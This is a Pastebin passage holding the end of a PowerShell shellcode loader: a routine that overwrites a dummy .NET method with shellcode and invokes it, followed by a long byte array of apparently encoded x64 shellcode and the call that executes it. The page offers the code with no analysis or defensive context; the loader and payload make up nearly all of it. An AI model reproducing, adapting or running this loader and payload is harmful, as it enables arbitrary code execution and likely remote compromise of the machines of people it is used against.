Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ([IntPtr]::Size*2)"))"
- Write-Verbose 'Overwriting dummy method with the shellcode...'
- $Arguments = New-Object Object[](3)
- $Arguments[0] = $TargetMethodAddress
- $Arguments[1] = $ShellcodeAddress
- $Arguments[2] = $FinalShellcode.Length
- # Overwrite the dummy method with the shellcode opcodes
- $OverwriteMethod.Invoke($null, $Arguments)
- Write-Verbose 'Executing shellcode...'
- # 'Invoke' our shellcode >D
- $ShellcodeReturnValue = $TargetMethod.Invoke($null, @(0x11112222))
- if ($ShellcodeReturnValue -eq 0)
- {
- Write-Verbose 'Shellcode executed successfully!'
- }
- }
- [Byte[]] $buf = 0x4d,0x31,0xff,0x49,0x89,0xe0,0x66,0x41,0x81,0xe0,0x0,0xf3,0xdb,0xd2,0x41,0xb7,0x43,0x49,0xf,0xae,0x0,0x48,0xb9,0x1d,0xa8,0xa8,0x5a,0xbd,0x90,0x28,0x24,0x4d,0x8b,0x70,0x8,0x49,0xff,0xcf,0x4b,0x31,0x4c,0xfe,0x24,0x4d,0x85,0xff,0x75,0xf3,0x55,0x21,0x48,0x13,0x2,0xef,0x5f,0x58,0xbe,0xaf,0xe3,0x42,0xb3,0xf6,0xd,0xd4,0xef,0xe5,0x99,0xbe,0x66,0x5d,0x69,0x90,0x20,0xe0,0xa7,0xf4,0xbd,0xd8,0xa3,0x54,0x15,0xe1,0x57,0x96,0xf3,0xa1,0x54,0xc2,0x7,0xe5,0x2d,0xbe,0xc8,0x63,0x8c,0x96,0x29,0xb6,0xfb,0x3c,0x86,0xe1,0xb0,0x55,0xce,0x99,0xe2,0x20,0x77,0xca,0x16,0xb,0x7,0x4a,0x2e,0xf1,0x45,0x6b,0x1e,0x5c,0xcf,0xb,0xee,0xa3,0x92,0xd7,0xdc,0x3,0x69,0x42,0x50,0xdb,0xef,0xaf,0x3b,0x81,0x51,0x46,0x2a,0xc3,0xd0,0x6d,0xd9,0xb1,0xf,0x45,0xbe,0x5f,0x83,0xe9,0x42,0xc8,0x73,0x12,0xc9,0xf2,0x3a,0xf7,0x4b,0x71,0xec,0x31,0x48,0x5e,0xb0,0x5d,0x2e,0x9c,0xe6,0xf,0x50,0xe9,0x17,0x44,0x88,0x3b,0x4a,0x3d,0xb7,0xd9,0x44,0x3d,0x57,0x8e,0x72,0x39,0xcd,0xe1,0x7f,0xff,0x6,0x1b,0x91,0x26,0x72,0x50,0x92,0x50,0xd3,0xb4,0xa0,0x27,0xe9,0xd6,0xbd,0xaf,0xf4,0xd8,0x3d,0x98,0x96,0xaa,0x23,0xf4,0x1b,0x5c,0xe,0xd7,0x73,0xb9,0xdf,0x58,0xd9,0x14,0xa8,0x98,0xcc,0xc1,0xb8,0x20,0x26,0xa3,0x84,0x98,0xb6,0xf9,0x81,0xe2,0x8,0x30,0xbf,0x98,0x96,0xaa,0x43,0x7d,0x11,0xe9,0xfd,0xfc,0x1d,0xfa,0x13,0x7f,0xa6,0xd4,0xb6,0xca,0x82,0x21,0x51,0xdc,0xfb,0x6f,0x77,0xbe,0xa7,0x55,0x8f,0xc8,0x95,0xa4,0x3f,0xb4,0xb6,0x6b,0xec,0xf9,0xf5,0x1f,0xdf,0x6a,0xc4,0xfd,0xa8,0xa6,0xe4,0x53,0x77,0xa4,0x1d,0xe6,0x32,0x8c,0x17,0x90,0x3c,0x49,0xc7,0x21,0x7a,0xd4,0xf5,0xb,0xb6,0xd1,0x8e,0x49,0x19,0xbd,0x7f,0xec,0xb6,0x99,0x40,0x9b,0xdc,0x58,0x35,0x17,0x30,0x99,0x51,0x92,0xc3,0x81,0x2,0xdb,0x40,0x60,0xad,0xd7,0x7,0x81,0x10,0x80,0xb6,0xc0,0xb2,0xab,0xf0,0x92,0x7f,0xd4,0x76,0x13,0xce,0xb6,0x22,0x27,0x7f,0xdc,0xb6,0x99,0x46,0x23,0x67,0xd0,0xd0,0x83,0x66,0xf9,0xcf,0xf0,0x72,0xb,0x14,0x87,0x62,0xc2,0x1d,0xb8,0xc8,0x79,0xa9,0xb0,0xe,0xaa,0x96,0xaa,0x4b,0x83,0x87,0xea,0x62,0xcc,0xfe,0xe6,0x54,0xd2,0xf3,0x51,0xd5,0x67,0x46,0x12,0xb3,0xf5,0xf4,0xd8,0x14,0x5c,0xc2,0xfa,0x4b,0xdd,0x74,0xb3,0x3d,0x67,0x43,0xc0,0x29,0x9c,0x35,0x79,0xfc,0xfb,0xfe,0xa8,0x23,0x32,0x17,0x51,0xdb,0xc8,0xc6,0xfa,0x73,0xb4,0xa4,0x98,0x6d,0xf0,0x7c,0xa5,0xfc,0x14,0xb,0xd,0xaa,0xf2,0x86,0xfc,0x74,0x9c,0x6d,0x7d,0x49,0xf9,0x69,0x7f,0xa6,0x34,0x80,0xd2,0xc2,0xd6,0x9e,0xdf,0xcf,0x1c,0x93,0xd8,0x3d,0x98,0xfc,0xaa,0x49,0xf0,0xa2,0x8f,0x55,0x9a,0x4f,0x62,0x7c,0xb,0x21,0x5b,0xc5,0x98,0xe8,0x9c,0xa8,0xc2,0x9e,0x98,0x55,0x98,0x86,0xaa,0x23,0xa2,0x9e,0xd8,0x55,0xc0,0x32,0xf9,0xc6,0xb,0x21,0x4b,0x6e,0xf2,0x96,0xfc,0x70,0xa3,0x9c,0xda,0xe4,0x50,0xc9,0x55,0xf6,0x77,0xc,0xd8,0x40,0xb0,0xce,0xc2,0x23,0xb4,0xf4,0xd8,0x57,0x98,0xc6,0xc2,0x28,0xdb,0xfb,0xe8,0xc2,0x4d,0xc1,0xc2,0x56,0x9a,0xb9,0xb9,0xc2,0x4d,0xc8,0xf4,0xdc,0xf8,0xd0,0xd7,0xb8,0xe8,0x69,0x55,0xdc,0x1d,0x6f,0x27,0xc2,0x67,0x97,0x69,0xa,0x32,0x81,0x19,0xfe,0x23,0x66,0x1f,0x81,0xa2,0x9e,0xd8,0x6e,0x67,0x43,0x7c,0x61,0x67,0xd1,0xbb
- Invoke-ShellcodeMSIL -Shellcode @($buf)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
